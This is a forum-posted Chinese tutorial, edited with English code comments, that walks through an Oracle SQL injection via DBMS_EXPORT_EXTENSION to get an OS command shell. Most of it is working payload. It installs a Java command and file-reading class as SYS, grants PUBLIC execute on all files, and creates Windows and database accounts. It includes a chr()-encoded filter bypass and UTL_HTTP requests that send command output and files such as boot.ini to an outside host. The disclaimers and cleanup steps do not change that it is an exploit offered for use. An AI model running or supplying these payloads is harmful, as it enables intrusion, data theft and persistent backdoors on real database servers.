标题:
实例演示oracle注入获取cmdshell的全过程
作者:
admin
时间:
2012-12-18 12:21
标题:
实例演示oracle注入获取cmdshell的全过程
以下的演示都是在 web 上的 SQL*Plus 中执行的。在 web 注入时，把 select SYS.DBMS_EXPORT_EXTENSION..... 改成

/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

的形式即可。（用 'a'|| 是为了让条件恒为 true：Oracle 把空字符串当作 NULL，没有这个前缀时子查询返回空串会使条件变成 UNKNOWN。）

语句有点长，可能要用 POST 提交。

勘误：下文各条 payload 中 DBMS_OUTPUT".PUT( 后面原本是绑定变量 :P1，即 PUT(:P1)；论坛把 ":P" 渲染成了表情，正文里因此显示成 PUT( 换行 1)。请以文末 chr() 编码版本（chr(58)||chr(80)||chr(49) 即 ":P1"）以及后面几条保留了 PUT(:P1) 的语句为准，缺少 :P1 时动态 PL/SQL 块很可能因绑定变量对不上而执行失败。

适用范围：SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES 的 PL/SQL 注入只存在于未打补丁的旧版本 Oracle 上（本文写于 2008 年），早已由 Oracle 的 Critical Patch Update 修复。本文的每一步都会在目标库上留下持久改动，只能在书面授权的测试范围内使用，并在测试后按最后的清理步骤复原。
以下是各个步骤：

1. 创建 Java 类

通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，以 SYS 身份在 Oracle 里创建 Java 类 LinxUtil（create ... java source，不是 PL/SQL 包），里面两个静态方法：runCMD 用于执行系统命令并返回其标准输出，readFile 用于读取文件：
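-- Step 1: create the Java helper class "LinxUtil" under SYS through the
-- GET_DOMAIN_INDEX_TABLES PL/SQL injection. The third argument closes the quoted
-- identifier the procedure builds, keeps the bind variable :P1 its dynamic block
-- expects, then appends our own EXECUTE IMMEDIATE inside an autonomous transaction.
-- FIX vs. the post: the forum rendered ":P" as an emoticon, so the payload showed
-- PUT(1); the bind must be PUT(:P1) (compare the chr()-encoded payload at the end).
-- runCMD(args) runs the command and returns its stdout with "\n" after each line;
-- stderr is not captured (only getInputStream() is read). readFile(filename)
-- returns the whole file the same way. Both catch every exception and return
-- e.toString() instead of failing, so an error looks like normal output.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as
import java.io.*;
public class LinxUtil extends Object {
  public static String runCMD(String args) {
    try {
      BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));
      String stemp, str = "";
      while ((stemp = myReader.readLine()) != null) str += stemp + "\n";
      myReader.close();
      return str;
    } catch (Exception e) { return e.toString(); }
  }
  public static String readFile(String filename) {
    try {
      BufferedReader myReader = new BufferedReader(new FileReader(filename));
      String stemp, str = "";
      while ((stemp = myReader.readLine()) != null) str += stemp + "\n";
      myReader.close();
      return str;
    } catch (Exception e) { return e.toString(); }
  }
}'''';END;'';END;--','SYS',0,'1',0) from dual
)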
------------------------

如果 URL 有长度限制，可以把 readFile() 方法去掉，即：
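-- Step 1 (short form): same as above without readFile(), for URL length limits.
-- FIX vs. the post: bind variable :P1 restored in DBMS_OUTPUT".PUT(:P1) — the forum
-- had turned ":P" into an emoticon, leaving PUT(1).
-- runCMD(args) returns the command's stdout, one "\n" per line; stderr is not read,
-- and any exception is returned as e.toString() rather than raised.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as
import java.io.*;
public class LinxUtil extends Object {
  public static String runCMD(String args) {
    try {
      BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));
      String stemp, str = "";
      while ((stemp = myReader.readLine()) != null) str += stemp + "\n";
      myReader.close();
      return str;
    } catch (Exception e) { return e.toString(); }
  }
}'''';END;'';END;--','SYS',0,'1',0) from dual
)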
同时把后面步骤里对 readFile()/LinxReadFile 的处理语句去掉。

------------------------------

2. 赋 Java 权限

注意：这一步把 java.io.FilePermission <<ALL FILES>> 的 execute 权限授给了 PUBLIC，也就是库里任何账号以后都能通过 Java 执行任意文件。这是持久化的全库级权限变更，测试结束后务必用 dbms_java.revoke_permission（参数与授权时相同）收回：
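-- Step 2: grant java.io.FilePermission <<ALL FILES>> "execute" to PUBLIC so the Java
-- code may spawn processes. This is a persistent, database-wide privilege change:
-- every account can now execute any file through Java. Revoke it afterwards with
-- dbms_java.revoke_permission and the same four arguments.
-- NOTE(review): readFile() would presumably need a "read" permission rather than
-- "execute"; if only file reads fail, check that first.
-- FIX vs. the post: bind variable :P1 restored (forum had turned ":P" into an emoticon).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual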
3. 创建函数

把上面两个 Java 静态方法包装成 PL/SQL 函数（call spec）。注入语句是以 SYS 身份执行的，所以函数落在 SYS 模式下，后面调用时要写成 sys.LinxRunCMD / sys.LinxReadFile：
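-- Step 3a: PL/SQL call spec exposing LinxUtil.runCMD as SYS.LinxRunCMD(p_cmd varchar2)
-- returning varchar2 (the command's stdout).
-- FIX vs. the post: bind variable :P1 restored (forum had turned ":P" into an emoticon).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual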
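-- Step 3b: PL/SQL call spec exposing LinxUtil.readFile as SYS.LinxReadFile(filename
-- varchar2) returning varchar2 (the file's contents). Skip this if the short form of
-- step 1 (without readFile) was used.
-- FIX vs. the post: bind variable :P1 restored (forum had turned ":P" into an emoticon).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual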
4. 赋 public 执行函数的权限

原文用的是 grant all，调用函数实际只需要 execute。这同样是对 PUBLIC 的持久授权；删除函数时授权会随之消失，否则要手工 revoke：
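-- Step 4a: let every account call SYS.LinxRunCMD.
-- FIX vs. the post: "grant all" replaced by "grant execute" — EXECUTE is all a caller
-- needs, and the grant is persistent until the function is dropped or it is revoked.
-- Bind variable :P1 restored (forum had turned ":P" into an emoticon).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant execute on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual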
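-- Step 4b: let every account call SYS.LinxReadFile (skip if readFile was left out).
-- FIX vs. the post: "grant all" replaced by the minimal "grant execute";
-- bind variable :P1 restored (forum had turned ":P" into an emoticon).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant execute on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual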
5. 测试上面的几步是否成功

数据字典里对象名是大写的。下面两条只检查对象是否已经存在，不验证真能执行；建议同时加上 owner='SYS' 和 status='VALID' 过滤，以排除创建成功但编译失败的情况：
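-- Step 5: confirm the wrapper functions exist in SYS and compiled cleanly.
-- Object names are stored upper-case in the dictionary. Both predicates keep the
-- 'a'|| prefix so a returned row always makes the condition true (the post mixed
-- '11'|| and a bare comparison). status='VALID' additionally rules out a function
-- that was created but failed to compile; owner='SYS' matches where the injected
-- DDL created it (see the sys.LinxRunCMD calls below).
and '1'<>'a'||(
select OBJECT_ID from all_objects where owner='SYS' and object_name='LINXRUNCMD' and status='VALID'
)

and '1'<>'a'||(
select OBJECT_ID from all_objects where owner='SYS' and object_name='LINXREADFILE' and status='VALID'
)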
6. 执行命令：

注意：下面第一条示例会在目标操作系统上新建账号 linx，这是对目标主机的持久性改动，一般超出授权测试的范围；取证时建议换成只读命令（例如 cmd /c whoami）。另外 Oracle 把空字符串当作 NULL，命令没有任何输出时 '1'<>(...) 为 UNKNOWN，会被误判为失败，建议像第 1 步那样写成 '1'<>'a'||(...)：
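-- Step 6: run an OS command / read a file through the SYS wrappers. This blind form
-- only tells you whether the call succeeded; the output is not shown.
-- FIX vs. the post: the 'a'|| prefix is needed here too. Oracle treats an empty
-- string as NULL, so a command with no output would make '1'<>(...) UNKNOWN and the
-- successful call would look like a failure.
-- WARNING: "net user linx /add" creates a Windows account on the target — a persistent
-- change that is out of scope for most authorized tests. Prefer a read-only command
-- such as 'cmd /c whoami' as proof of execution.
/xxx.jsp?id=1 and '1'<>'a'||(
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
)

/xxx.jsp?id=1 and '1'<>'a'||(
select sys.LinxReadFile('c:/boot.ini') from dual
)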
注意 sys.LinxReadFile() 返回的是 varchar2 类型，不能用 "and 1<>" 代替 "and '1'<>"。

如果要查看运行结果可以用 union（union 各列的数量和类型必须与原查询一致；返回值是 varchar2，输出过长时可能超出长度限制，可先截断或改用下面的带外方式）：
-- UNION shows the command output inline in the page. The column count and types must
-- match the original query (a single varchar2 column is assumed here). Note this
-- example re-runs "net user linx /add" — a persistent change on the target host.
-- The varchar2 return value presumably has a length limit; long outputs may error — verify.
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用 UTL_HTTP.request 把结果带外（out-of-band）发到自己控制的主机上。下面的 211.71.147.3 是原作者的接收端，使用时换成自己的；目标库要能访问该主机，11g 及以后还需要网络 ACL 允许 UTL_HTTP 外联：
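-- Out-of-band exfiltration via UTL_HTTP.request. Fixes vs. the post:
--  * Oracle string literals do not process backslash escapes, so REPLACE(x,'\n',...)
--    searched for a backslash followed by the letter n and never matched the real
--    newlines runCMD()/readFile() append. chr(10) is the newline character.
--  * The second request was labelled LinxRunCMD although it sends a file.
--  * 'a'|| prefix added so an empty HTTP response (NULL) does not read as failure.
-- Only spaces and newlines are escaped; other reserved characters (&, #, +, %, non-ASCII)
-- still break the query string. base64 (utl_encode.base64_encode on
-- utl_raw.cast_to_raw(...)) or utl_url.escape of the whole value is the robust option.
-- Replace 211.71.147.3 with a host you control; the database must be allowed to reach it.
/xxx.jsp?id=1 and '1'<>'a'||(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)

/xxx.jsp?id=1 and '1'<>'a'||(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxReadFile:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)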
注意：用 UTL_HTTP.request 时，要用 REPLACE() 把空格、换行符替换掉，否则会无法提交 HTTP 请求。Oracle 的字符串字面量不处理反斜杠转义，原文里的 '\n' 是反斜杠和字母 n 两个字符，匹配不到换行，换行符要写成 chr(10)。更稳妥的做法是对整段输出做 base64（utl_encode.base64_encode）或 utl_url.escape 编码，以免 &、#、+ 等字符也破坏 URL。

--------------------
7. 内部变化

通过以下查询可以看到 all_objects 中新增的对象（Java 源/类和两个函数），清理完成后再跑一遍应当没有结果：
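-- List everything the previous steps created so the cleanup can be verified.
-- Explicit columns instead of SELECT *, and a case-insensitive match so no object
-- is missed whichever case the dictionary stored the name in.
select owner, object_name, object_type, status from all_objects where upper(object_name) like '%LINX%'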
8. 删除我们创建的对象

原文只删除了 LinxRunCMD；完整清理还应删除 LinxReadFile、Java 源 "LinxUtil"，并收回第 2 步授予 PUBLIC 的 Java 权限（dbms_java.revoke_permission，参数与授权时相同）。每条语句同样通过注入执行：
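-- Step 8: remove everything the earlier steps created. The post only dropped
-- LinxRunCMD; LinxReadFile, the Java source and the PUBLIC Java permission stayed
-- behind. Run each statement through its own injection. Dropping a function also
-- removes the grants made on it. Dropping the Java source should remove the derived
-- JAVA CLASS as well — confirm with the all_objects query in step 7.
-- Bind variable :P1 restored (forum had turned ":P" into an emoticon).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''drop function LinxRunCMD'''';END;'';END;--','SYS',0,'1',0) from dual

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''drop function LinxReadFile'''';END;'';END;--','SYS',0,'1',0) from dual

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''drop java source "LinxUtil"'''';END;'';END;--','SYS',0,'1',0) from dual

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.revoke_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual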
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
" S9 V; N6 P- Y( Z- V/ L J
======================================================================
测试漏洞的另一方法：

创建 Oracle 账号（注意：这会在目标库留下一个口令与用户名相同的弱口令账号，验证完务必删除）：
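-- Alternative proof of the injection: create a database account. It leaves a weak,
-- predictable credential (linxsql/linxsql) on the target; drop it as soon as the
-- check is done (see the DROP USER payload below).
-- FIX vs. the post: bind variable :P1 restored (forum had turned ":P" into an emoticon).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual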
即（全部用 chr() 编码以绕过引号过滤；注意这个版本里 PUT(:P1) 是完整的，chr(58)||chr(80)||chr(49) 就是 ":P1"）：
-- Same CREATE USER payload with every literal built from chr() so it survives
-- single-quote filtering. Decoded, the third argument is:
--   DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''CREATE USER linxsql IDENTIFIED BY linxsql'';END;';END;--
-- and the fourth/sixth are 'SYS' and '1'. Here the bind :P1 is intact
-- (chr(58)||chr(80)||chr(49)), which is the form the quoted payloads above need too.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在（账号创建成功后 all_users 里会有 LINXSQL，条件为 true）：
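-- True when the LINXSQL account exists. EXISTS gives a plain true/false: the post's
-- 1<>(select user_id ...) depended on the scalar subquery returning a row and on the
-- user_id not happening to be 1, and yielded UNKNOWN (not false) when no row matched.
exists(
select 1 from all_users where username='LINXSQL'
)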
给 linxsql 连接权限（CONNECT 角色；验证只需要能登录，不要 grant dba）：
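-- Give the test account the CONNECT role only — enough to log in, nothing more.
-- FIX vs. the post: bind variable :P1 restored (forum had turned ":P" into an emoticon).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual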
删除账号（原文这一条保留了完整的 PUT(:P1)）：
-- Remove the test account once the check is done. Same injection shape as above;
-- the innermost statement is DROP USER LINXSQL, run as SYS in an autonomous transaction.
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(
  'FOO',
  'BAR',
  'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''drop user LINXSQL'''';END;'';END;--',
  'SYS',
  0,
  '1',
  0
) FROM dual
======================

以下方法创建一个可以执行任意语句的函数 Linx_query()，执行成功的话返回数值 1。但它声明为 authid current_user，以调用者权限运行：通过注入调用时权限是 web 应用数据库账号的，可能只有 PUBLIC 级别，作用不大。真要用的话原文建议先 grant dba 给当前用户——这同样是必须事后收回的高危改动：
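-- Create Linx_query(p): runs any statement p via EXECUTE IMMEDIATE and returns 1 on
-- success (any error propagates as an exception). It is AUTHID CURRENT_USER, so when
-- called through the injection it runs with the web application's database
-- privileges, not SYS's.
-- FIXES vs. the post: the second, truncated copy of this payload (") and ... 1.jsp?id=1
-- and '1'( select ...") was garbled and is omitted; the 'a'|| prefix is used as in
-- step 1 so an empty/NULL result does not read as failure.
-- Presumed call form (not shown in the post — verify):
--   and 1=(select Linx_query('...statement...') from dual)
1.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
)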